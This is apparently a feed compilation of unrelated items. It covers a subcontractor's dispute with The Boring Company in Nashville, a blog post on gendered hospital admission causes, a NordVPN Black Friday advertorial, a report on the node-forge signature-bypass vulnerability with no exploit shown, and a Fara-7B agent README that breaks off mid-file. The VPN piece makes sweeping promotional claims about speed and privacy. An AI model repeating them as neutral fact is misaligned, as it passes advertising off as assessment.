Willie Shane broke the asphalt on Elon Musk’s Music City Loop project this summer. Seven of his crew had been the sole excavators, fabricators and dump trucking company on The Boring Company’s proposed tunnel through Nashville for months.
Then came Monday night, when they walked off the site.
“I moved the equipment myself,” Shane said in an interview with the Banner on Tuesday.
“We were really skeptical from the beginning, and then since then, things pretty much just went downhill,” he added.
Musk’s company has a spotty record of completing similar tunnels in other cities, often snagging on government regulations and contractual issues. When Shane’s company, Shane Trucking and Excavating, which works with major local clients like the Grand Ole Opry and the Nashville International Airport, was approached by The Boring Company, he said he had some reservations.
“I told them very bluntly — and I don’t want this to come across like egotistical — but I told them, ‘Hey, my dad worked really hard to build a reputation in Nashville, and my brother and I work very hard to keep that reputation,’” Shane said. “If you guys are actually serious about doing this, you need to be 100 percent serious, because this is going to be our reputation as part of this too.”
After being reassured, Shane’s team took the job in July.
He and his crew left the state-owned property on Rosa L Parks Boulevard, where they had been working on the proposed 9-mile tunnel from the state capitol to the airport, after months of safety and financial issues with Musk’s company.
It started about a month in with a change in pay.
“We were supposed to be paid every 15 days. And then they switched accounting firms, and then it went from 15 days to 60,” Shane said. Now it’s been 123 days since they started digging, and Shane says The Boring Company has only paid out about five percent of what he’s owed.
According to Shane, he has still been able to pay his employees on time, but the local trucking company is left holding the bag for money unpaid by The Boring Company. Other subcontractors, he says, have also severed ties due to nonpayment on the project.
The final straw that caused Shane to pull his crew from the site came Monday, when multiple employees reported that a representative of The Boring Company was soliciting them to bail on Shane and work directly for TBC.
“One of their head guys texts two of my welders, offering them a job for $45 an hour from his work phone,” Shane described, noting that the same TBC employee denied sending the texts when confronted with screenshots. “That’s actually a breach of contract.”
Shane also says he and other vendors have filed multiple OSHA safety complaints since working on the site but have gotten no response. His biggest concerns have been Boring employees on the jobsite not wearing proper personal protective equipment, such as hard hats, and unsafe shoring, which he says he’s repeatedly complained about to the Boring Company.
“Where we’re digging, we’re so far down, there should be concrete and different structures like that to hold the slope back from falling on you while you’re working,” Shane explained. “Where most people use concrete, they currently have — I’m not even kidding — they currently have wood. They had us install wood 2x12s.”
The safety concerns are why Shane says he decided to make the issue public.
“We’re not coming forward in like a vindictive way,” Shane said. “I just don’t want someone to get hurt, sure, and then, in the future, I have to be like, ‘Dang, I worked on there, and I turned a blind eye to it.’”
In the meantime, Shane said that the amount of backpay owed to his company is in the six figures and that he has retained a lawyer.
Boring Company response
After the Banner contacted The Boring Company about Shane’s claims, Vice President David Buss said he connected with Shane and would make good on the outstanding invoices by the end of the day Wednesday and would do a “full audit” on the error.
“It does look like we had some invoicing errors on that,” Buss told the Banner. “It was, you know, unfortunately, too common of a thing, but I assured them that we are going to make sure that invoices are wired tomorrow.”
Buss later clarified that he does not believe The Boring Company has a “common” practice of missing payments to vendors, but rather missed payments happen sometimes during “the normal course of business.”
“You hate to have an unhappy vendor. We certainly aim to have great relationships,” Buss said. “And so my goal will be to figure out what happened in this incident and then make sure that that’s not extrapolated to any other incidents.”
Buss also said he was looking into Shane’s claims about The Boring Company trying to hire contractors.
“It is definitely not our practice to try to poach anybody, so I understand the frustrations on their side,” Buss said. “Hopefully it’s something where we’re able to smooth that over and correct some of the things that happened on site and that led to this.”
Asked about the safety complaints, Buss said Shane did not raise any concerns on their call Tuesday and said he was unaware of any OSHA complaints, but would look into it.
“Safety is existential to our company,” Buss said. “We thankfully have a long history of seven years of tunneling in Las Vegas, and we’ve had one construction-related injury that was not the company’s fault in a violation.”
Hiring headaches
According to Buss, the projected timeline had not changed, and work had not been slowed by the crews’ departure from the site. Shane, however, painted a different picture.
“Actually, we were the crew that was building the tunnel boring machine. So there’s nobody building the tunnel boring machine right now, and the Boring Company has been trying to hire welders, but they haven’t been able to secure any help,” Shane said Tuesday, noting that many prospective employees won’t work on the project because of Musk’s reputation.
“A lot of people don’t like Elon and their payment terms; the way that they pay their employees, is not traditional,” Shane said.
Buss denied any hiring trouble.
“We’ve had zero issues finding great talent thus far in Nashville,” Buss said. “I think we’ve hired about 14 people now, and we’re going to start to grow the team as we begin mining operations.”
As reports of a second Boring tunnel under Broadway and West End surfaced, Boring Company CEO Steve Davis hosted a two-hour live update session Monday evening on X, the social media website also owned by Musk, in which he touted progress on the Music City Loop and described the project as smoothly underway, with boring set to begin around January after the proper permits are secured.
An hour later, Shane’s team left the site.
During Davis’ virtual meeting, members of the public could submit questions, some of which were answered by Boring Company leadership. Many of those questions came from State Sen. Heidi Campbell (D-Nashville), who represents the area and has been a vocal critic of the project since it was announced.
“I would say the promotional session that they had last night on Twitter was disingenuous at best, if not dishonest, because it was, it sounded like a utopian project and then, lo and behold, the very next day, we find out that there are people leaving the site because they’re not getting paid and they’re not being treated well,” Campbell told the Banner.
In addition to her concerns about irreparable damage to the site and whether the project would even be completed, Campbell said she was concerned about the state’s liability if there were unsafe working conditions on the leased property and whether there was any way for lawmakers to stop the process.
“There is nothing to hold The Boring Company accountable for any of these things,” Campbell said of the lease. “They’ve already dug a big hole. But then on top of it, if they move forward, forward in any capacity, they have not proven that they are reliable to take care of the damage that they cause.”
When Shane first spoke to the Banner, he said he did not intend to return to the job even if they received payment, noting that his employees had expressed discomfort “because they didn’t feel the management there was very good.”
Hours later, after hearing from Buss, Shane said he would consider returning “if they correct the situation on their end.”
Demetria Kalodimos contributed to this report
.
The most male and female reasons to end up in hospital
The first post I wrote for this blog was about people being injured by dogs. Specifically, how much of this goes on, and what counts as a lot.
We can measure this reasonably well in England, because the health service publishes annual data for hospital admissions showing what people were admitted for.
This often includes not just the physical condition that needed treatment, but the event that led to that condition in the first place. So not just the tissue damage on someone’s hand, in other words, but the story of a dog bite behind it.
These second-order reasons for admission—known as “external causes”—cover a whole world of horrible mishaps beyond the ones that I looked at last time. The data also records whether the patient was male or female, so I wondered what the most male and most female external causes might be.
To cut to the chase, here they are.
When I began the crunching that produced these numbers, I’d given no thought at all to what I would find. If I had, it would have been obvious that pregnancy would top the charts on the female side.
But I don’t think I could have imagined what a stark dossier of male and female stereotypes I was compiling. Because to me, the chart above basically says that violence, physical labour, sport and machines are the most typically male ways to end up in hospital, while pregnancy, beauty, animals and mental health are the most typically female.
I’m having to choose my words carefully, because I need to stress one thing: these are not the most common reasons for men and women to be admitted to hospital. They are the most typically male and typically female.
So only about 400 men in the whole of England go to hospital after falls from scaffolding each year. But that cause is at the top of the chart because it is the reason for admission that’s most male-dominated—just as the various pregnancy-related reasons are the most female. (I’ve put the total number of admissions in the column on the right, to give an actual sense of scale.)
In practice, I’d guess that these causes are the things that men or women do more often, or more dangerously.
Some minor points: I excluded all the external causes with fewer than 1,000 admissions in the last three years, so everything you see here happens at least fairly frequently and amounts to a reasonable sample. I also excluded a small number of admissions (less than half a percent) that are classified “Gender Unknown”.
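For anyone who wants to reproduce this kind of crunching, the core calculation is just a grouped share. Here is a minimal pandas sketch, assuming a hypothetical CSV with columns `external_cause`, `gender` and `admissions` (not the NHS file's actual layout):

```python
import pandas as pd

# Hypothetical layout: one row per external cause and gender, with an admissions count.
df = pd.read_csv("external_causes.csv")

# Drop the small "Gender Unknown" slice, as described above.
df = df[df["gender"] != "Gender Unknown"]

# One row per cause, with male and female admission counts side by side.
wide = df.pivot_table(index="external_cause", columns="gender",
                      values="admissions", aggfunc="sum").fillna(0)

# Keep causes with at least 1,000 admissions so every row is a reasonable sample.
wide["total"] = wide["Male"] + wide["Female"]
wide = wide[wide["total"] >= 1000]

# Share of each cause's admissions that were male; the extremes of this column
# are the "most male" and "most female" external causes.
wide["male_share"] = wide["Male"] / wide["total"]
print(wide.sort_values("male_share", ascending=False).head(10))  # most male
print(wide.sort_values("male_share").head(10))                   # most female
```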
Some of the external causes have very longwinded names, so I’ve made them as simple as possible. “Agents primarily acting on smooth and skeletal muscles and the respiratory system” is especially unenlightening, although I suspect it might have something to do with Botox.
In the next few days I plan to upload all the data in a searchable table (if I can make that work) so you can explore it in other ways too.
NordVPN Black Friday Deal: Unlock 77% off VPN plans in 2025
Bleeping Computer
www.bleepingcomputer.com
2025-11-26 20:00:37
The NordVPN Black Friday Deal is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you've been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deals this Black Frida...
Want one of the best VPN discounts of 2025? This NordVPN Black Friday deal gives you the fastest VPN with strong digital security and US Netflix access – all at an unbeatable price.
NordVPN Black Friday Deal: Unlock up to 77% off VPN plans in 2025
The NordVPN Black Friday Deal is now live, and you can get the best discount available: 77% off that applies automatically when you follow our link. If you’ve been waiting for the right moment to upgrade your online security, privacy, and streaming freedom, this is the one VPN deal we can guarantee will have you smiling all year round.
There’s no better time to buy a VPN than Black Friday or Cyber Monday. You get the same premium VPN that costs more at any other time of year, but at a fraction of the price. What’s more, if you grab a 1-year, 2-year, or even a 3-year plan right now, your renewal will fall during Black Friday. That means you’ll be able to hunt for another discount each time you need a VPN subscription.
So, why NordVPN? Besides having one of the best discounts, NordVPN ranks as the fastest VPN thanks to its NordLynx protocol (WireGuard fork). Fast VPN speeds make Nord perfect for Netflix access, HD streaming, gaming, and torrenting.
It enforces a strict no-logs policy, offers powerful Threat Protection Pro, and bundles valuable extras like NordPass, NordLocker, and NordProtect (Identity Theft Protection) for better everyday protection online.
NordVPN offers a more comprehensive privacy suite. Plus, with a 30-day money-back guarantee, you can try it risk-free while the discount lasts. If you want the biggest NordVPN savings of 2025, Black Friday is the perfect time to act.
NordVPN: The best Black Friday deal of 2025
The top promo this year is NordVPN’s 2-year plan. It is available with a massive 77% discount plus three extra months free. Best of all? NordVPN’s Black Friday pricing immediately surpasses VPN promotions advertised by competing providers.
In 2025, NordVPN confirmed that its Black Friday and Cyber Monday promotion runs from October 16 through December 10. That gives you nearly two months to grab the most impressive VPN deals of 2025.
Here’s what NordVPN had to say:
"Black Friday is a busy time — and not just for shoppers. Cybercriminals are also highly active during this period, so remember to take the necessary steps to protect yourself online. NordVPN protects your online traffic with encryption, making you safer on every network and device."
Get the discount – with no strings attached
When you follow the link in this article, the Black Friday deal will activate automatically – no codes or hoops to jump through.
The deal brings the total down to just $80.73 for 27 months of NordVPN Basic.
To put that into perspective, the regular subscription costs $12.99 per month, which means you’d normally pay $77.94 for just six months of VPN protection.
With this Black Friday deal, you’re getting well over two years of protection, unbeatable streaming access on vacation, and some of the best online security tools we have ever tested – for a fraction of the usual cost.
This is exactly why NordVPN’s Black Friday bundle is turning heads across the VPN industry. And why it’s easily the most competitive VPN offer we’ve managed to land on this season.
NordVPN’s Black Friday deal means you’ll get security, privacy, Netflix access, and WiFi privacy at the lowest cost.
NordVPN bundle deals
NordVPN
didn't stop at its Basic plan this Black Friday. The leading privacy provider has also slashed prices across its premium bundles. This gives you access to the Ultimate Nord Security ecosystem at prices we’ve never seen outside the Black Friday window.
NordVPN Plus
The first standout option for bargain hunters seeking better all-around protection is the NordVPN Plus subscription.
This plan includes full VPN access, Threat Protection Pro (an always‑on security layer that blocks malware, phishing websites, intrusive ads, and trackers in real time, even when the VPN is disconnected), and Nord’s secure password manager.
This Black Friday, you can get this all bundled for just $3.89 per month: turning a standard VPN subscription into a full-blown online security suite, at a price point that beats most competitors' basic plans.
If you’re looking for an online protection suite with reliable filtering against trackers, ads, and malware, NordVPN delivers exactly that. It also includes a top-tier password manager that helps secure your accounts against hackers and phishing.
What’s more, NordVPN’s pricing is unusually generous for the amount of protection you get. It’s genuinely rare to find such a comprehensive security bundle at a cost that beats what most providers charge for the VPN alone.
NordVPN Ultimate
Hunting for the ultimate VPN deal of the year? NordVPN’s “Ultimate” plan is the centerpiece of its 2025 Black Friday event.
Normally valued at $626.13, the 27-month Ultimate plan is currently discounted to just $159. That works out to $5.89 per month, which is a massive 77% price cut.
Ultimate includes every service and feature that Nord Security offers. You get unlimited VPN use, the password manager, upgraded anti-malware and anti-tracking tools, 1TB of encrypted cloud storage, and even $5,000 in scam loss insurance through NordProtect. Just bear in mind that insurance is only available to US residents.
When you consider that Google charges $5 per month for just 1TB of cloud storage, Nord’s Black Friday pricing really comes out swinging! For only 89 cents more, you’ll get cloud storage plus a VPN, password manager, advanced threat filtering, and identity theft protection.
For anyone looking to build a full security stack at the lowest possible cost, these Black Friday bundles are among the strongest tech deals of the year.
Which VPN features does NordVPN come with?
No matter whether you choose NordVPN Basic, Plus, or Ultimate, you'll get full access to NordVPN’s complete VPN feature set. All core tools, including global server options, VPN protocol options, privacy settings, and security features, remain identical across all plans.
The higher-tier bundles simply add extra services such as password management, advanced threat filtering, encrypted cloud storage, and identity protection.
That means you can stick with NordVPN Basic if all you want is a powerful, fast, and fully featured VPN. The upgrades are optional add-ons and will not change how the VPN itself performs.
Full NordVPN feature list:
Strong encryption of all traffic
(AES‑256 with modern VPN protocols like NordLynx/
WireGuard
, OpenVPN, and IKEv2 for both security and speed).
Protection against ISP or network surveillance
by hiding all browsing activity inside an encrypted tunnel.
IP address masking
so websites and services see the VPN server’s IP instead of your real one, improving privacy and helping avoid IP‑based tracking.
Location spoofing
lets you choose from thousands of servers in 127+ countries, useful for
bypassing geo‑restrictions
and regional blackouts.
Ad blocking
at the server level to strip many ads before they reach your device (via Threat Protection/Threat Protection Pro).
Tracking prevention
by blocking common tracking domains and cookies so advertisers and analytics tools collect less data on you.
Malicious site blocking
that stops connections to known phishing, malware, and scam domains before they load.
Malware download scanning
(on supported desktop apps) that checks downloaded files.
MultiHop VPN routing (Double VPN)
, sending your traffic through two VPN servers with two layers of encryption for extra anonymity in high‑risk situations.
Tor over VPN
sends your traffic first through the VPN and then into the
Tor network
for stronger identity protection on .onion sites.
Automatic
kill switch
that cuts your internet connection if the VPN drops, preventing any data from leaking outside the encrypted tunnel.
DNS leak protection
by forcing all DNS lookups through NordVPN’s own DNS resolvers, so your ISP cannot see what domains you visit.
Obfuscated servers
(NordWhisper / obfuscation) to hide the fact that you are using a VPN. Useful to connect on restrictive networks and to use the VPN in high-censorship countries.
P2P‑optimized servers
for safer torrenting and other peer‑to‑peer traffic without sacrificing too much speed.
Streaming‑optimized servers
(SmartPlay) that automatically use working DNS/routes to access major streaming platforms when they try to block VPN IPs.
Split tunneling
(on supported apps) so you can choose which apps use the VPN and which go directly to the internet—for example, routing only your browser through the VPN while games or banking apps use a normal connection.
Private DNS servers
operated by NordVPN instead of your ISP’s DNS, reducing data exposure and some forms of DNS‑based censorship.
High‑speed connections
(including 10 Gbps locations and NordLynx) to minimize the performance hit usually associated with VPNs.
Support for up to 10 simultaneous devices
under one subscription, so you can cover multiple personal devices or family members at once.
Optional dedicated IP addresses
so you can get a consistent IP (useful for hosting, remote access, avoiding CAPTCHA, and accessing strict streaming accounts).
Native apps for Windows,
macOS
, Linux, Android, iOS/iPadOS, Android TV
, and many
smart TVs
, Amazon Fire TV/Firestick, Apple TV, and Apple Vision (via native/tvOS/visionOS support).
Browser extensions
(proxy-based protection) for Chrome, Firefox, and Microsoft Edge.
Why NordVPN is the standout Black Friday VPN deal of 2025
NordVPN
is one of the most trusted VPN brands on the market, and its Black Friday and Cyber Monday deals make 2025 the perfect time to lock in long-term savings.
The service is headquartered in privacy-friendly Panama, a location that puts it well out of reach of data-hungry jurisdictions like the US, the UK, and the EU. Thanks to Panama's lack of mandatory data retention laws, NordVPN can maintain a
strict no-logging policy
. That means Nord has no records of your activities, even if the government comes knocking with a warrant.
Add to this its wide feature set and excellent third-party audit results, and you can see why NordVPN continues to stand out as one of the best value VPN options for netizens who care about strong privacy and watertight online security.
With the NordVPN Black Friday Deal, you will get access to all the premium features that helped NordVPN earn its reputation. This includes its NordLynx protocol (built on WireGuard to make NordVPN the
fastest VPN
), advanced encryption, and reliable privacy settings for users in countries where surveillance and censorship are a part of daily life.
Fully optimized for streaming
When it comes to streaming, NordVPN is exceptional. During our tests, its international network successfully accessed
multiple Netflix regions
, Hulu, HBO Max, Disney+,
Prime Video
, YouTube TV, DirecTV, SlingTV, BBC iPlayer, Joyn, Canal+,
Crave
, ESPN+, FOX, ABC, NBC, and Peacock.
And its fast connection speeds make it perfect for HD streaming without buffering, as well as for
gaming
, torrenting, and making video calls.
Does NordVPN have apps for all platforms?
Yes, NordVPN gives you comprehensive coverage for every gadget you own.
NordVPN provides custom apps for all major platforms (including Windows, macOS, iOS, Android,
Linux
, and Amazon Firestick), making it a practical, versatile option for households with mixed devices.
Each subscription supports up to 10
simultaneous connections
, allowing you to protect phones, tablets, laptops, smart TVs, and even school or work devices under one account.
With this year’s Black Friday pricing, NordVPN has turned one of the most polished premium VPNs on the market into a cheap VPN we can confidently recommend.
Popular Forge library gets fix for signature verification bypass flaw
Bleeping Computer
www.bleepingcomputer.com
2025-11-26 19:32:42
A vulnerability in the 'node-forge' package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid. [...]...
A vulnerability in the ‘node-forge’ package, a popular JavaScript cryptography library, could be exploited to bypass signature verifications by crafting data that appears valid.
The flaw is tracked as CVE-2025-12816 and received a high severity rating. It arises from the library’s ASN.1 validation mechanism, which allows malformed data to pass checks even when it is cryptographically invalid.
“An interpretation-conflict vulnerability in node-forge versions 1.3.1 and earlier enables unauthenticated attackers to craft ASN.1 structures to desynchronize schema validations, yielding a semantic divergence that may bypass downstream cryptographic verifications and security decisions,” reads the flaw's description in the National Vulnerability Database (NVD).
Hunter Wodzenski of Palo Alto Networks discovered the flaw and reported it responsibly to the node-forge developers.
The researcher warned that applications that rely on node-forge to enforce the structure and integrity of ASN.1-derived cryptographic protocols can be tricked into validating malformed data, and provided a proof-of-concept demonstrating how a forged payload could trick the verification mechanism.
A security advisory from the Carnegie Mellon CERT-CC explains that the impact varies per application, and may include authentication bypass, signed data tampering, and misuse of certificate-related functions.
“In environments where cryptographic verification plays a central role in trust decisions, the potential impact can be significant,” CERT-CC warns.
The impact may be significant considering that node-forge is massively popular, with close to 26 million weekly downloads on the Node Package Manager (NPM) registry.
The library is used by projects that need cryptographic and public-key infrastructure (PKI) functionality in JavaScript environments.
A fix was released earlier today in version 1.3.2. Developers using node-forge are advised to upgrade to the latest version as soon as possible.
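If you are unsure whether a project still pins an affected release, one quick check is to walk the lockfile. A minimal sketch, assuming npm's lockfile v2/v3 layout with a top-level "packages" map and plain x.y.z version strings:

```python
import json

# Flag any node-forge entry at or below 1.3.1 (1.3.2 carries the fix).
def is_vulnerable(version: str) -> bool:
    parts = tuple(int(p) for p in version.split(".")[:3])
    return parts <= (1, 3, 1)

with open("package-lock.json") as f:
    lock = json.load(f)

for path, meta in lock.get("packages", {}).items():
    if path.endswith("node_modules/node-forge"):
        version = meta.get("version", "")
        status = "VULNERABLE" if version and is_vulnerable(version) else "ok"
        print(f"{path}: node-forge {version or 'unknown'} -> {status}")
```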
Flaws in widely used open-source projects can persist for a long time after their public disclosure and the availability of a patch. This can happen for various reasons, including the complexity of some environments and the need to test the new code before deploying it.
Maybe it’s because my eyes are getting old or maybe it’s because the contrast between windows on macOS keeps getting worse. Either way, I built a tiny Mac app last night that draws a border around the active window. I named it “Alan”.
In Alan’s preferences, you can choose a preferred border width and colors for both light and dark mode.
Fara-7B: An Efficient Agentic Model for Computer Use
Overview
Fara-7B is Microsoft's first agentic small language model (SLM) designed specifically for computer use. With only 7 billion parameters, Fara-7B is an ultra-compact Computer Use Agent (CUA) that achieves state-of-the-art performance within its size class and is competitive with larger, more resource-intensive agentic systems.
Try out Fara-7B locally as follows (see Installation for detailed instructions):
vllm serve "microsoft/Fara-7B" --port 5000 --dtype auto
Then you can query it interactively with:
fara-cli --task "whats the weather in new york now"
Hint: you might need to add --tensor-parallel-size 2 to the vllm command if you run out of memory.
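Because vllm serve exposes an OpenAI-compatible API, you can also hit the endpoint directly. A minimal sketch using the openai Python client (this only checks that the server responds; real tasks should go through fara-cli, which supplies the browser screenshots the model acts on):

```python
# Assumes the server started with: vllm serve "microsoft/Fara-7B" --port 5000
from openai import OpenAI

client = OpenAI(base_url="http://localhost:5000/v1", api_key="EMPTY")

response = client.chat.completions.create(
    model="microsoft/Fara-7B",
    messages=[{"role": "user", "content": "whats the weather in new york now"}],
    max_tokens=256,
)
print(response.choices[0].message.content)
```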
What Makes Fara-7B Unique
Unlike traditional chat models that generate text-based responses, Fara-7B leverages computer interfaces—mouse and keyboard—to perform multi-step tasks on behalf of users. The model:
- Operates visually by perceiving webpages and taking actions like scrolling, typing, and clicking on directly predicted coordinates
- Uses the same modalities as humans to interact with computers—no accessibility trees or separate parsing models required
- Enables on-device deployment due to its compact 7B parameter size, resulting in reduced latency and improved privacy as user data remains local
- Completes tasks efficiently, averaging only ~16 steps per task compared to ~41 for comparable models
Fara-7B is trained using a novel synthetic data generation pipeline built on the Magentic-One multi-agent framework, with 145K trajectories covering diverse websites, task types, and difficulty levels. The model is based on Qwen2.5-VL-7B and trained with supervised fine-tuning.
Key Capabilities
Fara-7B can automate everyday web tasks including:
Searching for information and summarizing results
Filling out forms and managing accounts
Booking travel, movie tickets, and restaurant reservations
Shopping and comparing prices across retailers
Finding job postings and real estate listings
Performance Highlights
Fara-7B achieves state-of-the-art results across multiple web agent benchmarks, outperforming both comparable-sized models and larger systems:
| Model | Params | WebVoyager | Online-M2W | DeepShop | WebTailBench |
|---|---|---|---|---|---|
| SoM Agents | | | | | |
| SoM Agent (GPT-4o-0513) | - | 90.6 | 57.7 | 49.1 | 60.4 |
| SoM Agent (o3-mini) | - | 79.3 | 55.4 | 49.7 | 52.7 |
| SoM Agent (GPT-4o) | - | 65.1 | 34.6 | 16.0 | 30.8 |
| GLM-4.1V-9B-Thinking | 9B | 66.8 | 33.9 | 32.0 | 22.4 |
| Computer Use Models | | | | | |
| OpenAI computer-use-preview | - | 70.9 | 42.9 | 24.7 | 25.7 |
| UI-TARS-1.5-7B | 7B | 66.4 | 31.3 | 11.6 | 19.5 |
| Fara-7B | 7B | 73.5 | 34.1 | 26.2 | 38.4 |
Table: Online agent evaluation results showing success rates (%) across four web benchmarks. Results are averaged over 3 runs.
WebTailBench: A New Benchmark for Real-World Web Tasks
We are releasing WebTailBench, a new evaluation benchmark focusing on 11 real-world task types that are underrepresented or missing in existing benchmarks. The benchmark includes 609 tasks across diverse categories, with the first 8 segments testing single skills or objectives (usually on a single website), and the remaining 3 evaluating more difficult multi-step or cross-site tasks.
WebTailBench Detailed Results
| Task Segment | Tasks | SoM GPT-4o-0513 | SoM o3-mini | SoM GPT-4o | GLM-4.1V-9B | OAI Comp-Use | UI-TARS-1.5 | Fara-7B |
|---|---|---|---|---|---|---|---|---|
| Single-Site Tasks | | | | | | | | |
| Shopping | 56 | 62.5 | 71.4 | 38.1 | 31.0 | 42.3 | 41.1 | 52.4 |
| Flights | 51 | 60.1 | 39.2 | 11.1 | 10.5 | 17.6 | 10.5 | 37.9 |
| Hotels | 52 | 68.6 | 56.4 | 31.4 | 19.9 | 26.9 | 35.3 | 53.8 |
| Restaurants | 52 | 67.9 | 59.6 | 47.4 | 32.1 | 35.9 | 22.4 | 47.4 |
| Activities | 80 | 70.4 | 62.9 | 41.7 | 26.3 | 30.4 | 9.6 | 36.3 |
| Ticketing | 57 | 58.5 | 56.7 | 37.4 | 35.7 | 49.7 | 30.4 | 38.6 |
| Real Estate | 48 | 34.0 | 17.4 | 20.1 | 16.0 | 9.0 | 9.7 | 23.6 |
| Jobs/Careers | 50 | 49.3 | 44.0 | 32.7 | 22.7 | 20.7 | 20.7 | 28.0 |
| Multi-Step Tasks | | | | | | | | |
| Shopping List (2 items) | 51 | 66.0 | 62.7 | 17.0 | 7.8 | 34.0 | 20.9 | 49.0 |
| Comparison Shopping | 57 | 67.3 | 59.1 | 27.5 | 22.8 | 1.2 | 8.8 | 32.7 |
| Compositional Tasks | 55 | 51.5 | 39.4 | 26.7 | 17.0 | 10.3 | 9.1 | 23.0 |
| Overall | | | | | | | | |
| Macro Average | 609 | 59.7 | 51.7 | 30.1 | 22.0 | 25.3 | 19.9 | 38.4 |
| Micro Average | 609 | 60.4 | 52.7 | 30.8 | 22.4 | 25.7 | 19.5 | 38.4 |
Table: Breakdown of WebTailBench results across all 11 segments. Success rates (%) are averaged over 3 independent runs. Fara-7B achieves the highest performance among computer-use models across all task categories.
Coming Soon:
Task Verification pipeline for LLM-as-a-judge evaluation
Official human annotations of WebTailBench (in partnership with BrowserBase)
Evaluation Infrastructure
Our evaluation setup leverages:
Playwright
- A cross-browser automation framework that replicates browser environments
Abstract Web Agent Interface
- Allows integration of any model from any source into the evaluation environment
Fara-Agent Class
- Reference implementation for running the Fara model
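The repository's own classes are not reproduced here, but the shape of such an interface is roughly a model-agnostic loop around a Playwright page. A minimal sketch with hypothetical class and method names (not the repo's actual API):

```python
# Minimal sketch of a model-agnostic web-agent loop around Playwright.
from dataclasses import dataclass
from playwright.sync_api import sync_playwright

@dataclass
class Action:
    kind: str          # e.g. "click", "type", "terminate"
    x: int = 0
    y: int = 0
    text: str = ""

class WebAgent:
    """Anything that can turn a screenshot plus a task into the next action."""
    def next_action(self, task: str, screenshot: bytes) -> Action:
        raise NotImplementedError

def run_episode(agent: WebAgent, task: str, start_page: str, max_steps: int = 100) -> None:
    with sync_playwright() as p:
        browser = p.chromium.launch()
        page = browser.new_page()
        page.goto(start_page)
        for _ in range(max_steps):          # per-trajectory step budget
            action = agent.next_action(task, page.screenshot())
            if action.kind == "terminate":
                break
            elif action.kind == "click":
                page.mouse.click(action.x, action.y)
            elif action.kind == "type":
                page.keyboard.type(action.text)
        browser.close()
```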
Note:
Fara-7B is an experimental release designed to invite hands-on exploration and feedback from the community. We recommend running it in a sandboxed environment, monitoring its execution, and avoiding sensitive data or high-risk domains.
Installation
Install the package using either UV or pip:
or
Then install Playwright browsers:
Hosting the Model
Recommended:
The easiest way to get started is using Azure Foundry hosting, which requires no GPU hardware or model downloads. Alternatively, you can self-host with VLLM if you have GPU resources available.
Azure Foundry Hosting (Recommended)
Deploy Fara-7B on
Azure Foundry
without needing to download weights or manage GPU infrastructure.
Setup:
Deploy the Fara-7B model on Azure Foundry and obtain your endpoint URL and API key
Add your endpoint details to the existing endpoint_configs/ directory (example configs are already provided):
# Edit one of the existing config files or create a new one
# endpoint_configs/fara-7b-hosting-ansrz.json (example format):
{
"model": "Fara-7B",
"base_url": "https://your-endpoint.inference.ml.azure.com/",
"api_key": "YOUR_API_KEY_HERE"
}
Run the Fara agent:
fara-cli --task "how many pages does wikipedia have" --start_page "https://www.bing.com"
That's it! No GPU or model downloads required.
Self-hosting with VLLM
If you have access to GPU resources, you can self-host Fara-7B using VLLM. This requires a GPU machine with sufficient VRAM.
All that is required is to run the following command to start the VLLM server:
vllm serve "microsoft/Fara-7B" --port 5000 --dtype auto
Testing the Fara Agent
Run the test script to see Fara in action:
fara-cli --task "how many pages does wikipedia have" --start_page "https://www.bing.com" --endpoint_config endpoint_configs/azure_foundry_config.json [--headful] [--downloads_folder "/path/to/downloads"] [--save_screenshots] [--max_rounds 100] [--browserbase]
In the self-hosting scenario, the endpoint_config points to endpoint_configs/vllm_config.json from the VLLM server above.
If you set --browserbase, export environment variables for the API key and project ID.
Expected Output
Initializing Browser...
Browser Running... Starting Fara Agent...
##########################################
Task: how many pages does wikipedia have
##########################################
Running Fara...
Thought #1: To find the current number of Wikipedia pages, I'll search for the latest Wikipedia page count statistics.
Action #1: executing tool 'web_search' with arguments {"action": "web_search", "query": "Wikipedia total number of articles"}
Observation#1: I typed 'Wikipedia total number of articles' into the browser search bar.
Thought #2: Wikipedia currently has 7,095,446 articles.
Action #2: executing tool 'terminate' with arguments {"action": "terminate", "status": "success"}
Observation#2: Wikipedia currently has 7,095,446 articles.
Final Answer: Wikipedia currently has 7,095,446 articles.
Enter another task (or press Enter to exit):
Reproducibility
We provide a framework in webeval/ to reproduce our results on WebVoyager and OnlineMind2Web.
Agentic evaluations on live websites present unique challenges due to day-to-day changes. We implement several measures to ensure reliable and comparable evaluations:
BrowserBase Integration
We employ BrowserBase to manage browser session hosting, enabling reliable browser instance management.
Time-sensitive Task Updates
Tasks in benchmarks like WebVoyager can become stale or impossible. We:
Removed ~48 impossible tasks from the original WebVoyager benchmark
Updated ~50 tasks with future dates to keep them achievable
Example: “Search for a hotel in Bali from Jan 1 to Jan 4, 2024” → “Search for a hotel in Bali from Jan 1 to Jan 4, 2026”
Our updated WebVoyager benchmark is available at webeval/data/webvoyager/WebVoyager_data_08312025.jsonl
Trajectories are retried up to 5 times when environment errors occur
Complete yet incorrect trajectories are never retried
Each retry starts with a fresh browser session, with no retained state
Step Budget
Each trajectory is capped at a maximum of 100 actions across all online benchmarks. Trajectories exceeding this budget without choosing to stop are considered incorrect.
screenshot_X.png - Screenshots captured before each action X
Running Analysis
Use the analysis notebook to compute metrics:
cd webeval/scripts/analyze_eval_results/
jupyter notebook analyze.ipynb
The script:
Identifies trajectories aborted mid-execution and diagnostic reasons
Computes average scores across non-aborted trajectories
Distinguishes between aborted trajectories (errors during sampling) and completed trajectories (with terminate() call or step budget exceeded)
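The aggregation itself is straightforward. A minimal sketch of the same computation, assuming one JSON line per trajectory with hypothetical aborted and score fields:

```python
import pandas as pd

results = pd.read_json("eval_results.jsonl", lines=True)

# Aborted trajectories (errors during sampling) are excluded from scoring;
# completed ones either called terminate() or exceeded the step budget.
completed = results[~results["aborted"]]
success_rate = 100 * completed["score"].mean()

print(f"aborted: {len(results) - len(completed)}, "
      f"success rate over {len(completed)} completed trajectories: {success_rate:.1f}%")
```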
To re-run failed tasks, execute the evaluation script again with the same run_id and username - it will skip non-aborted tasks.
Example WebVoyager GPT Eval Result
{
"score": 1.0,
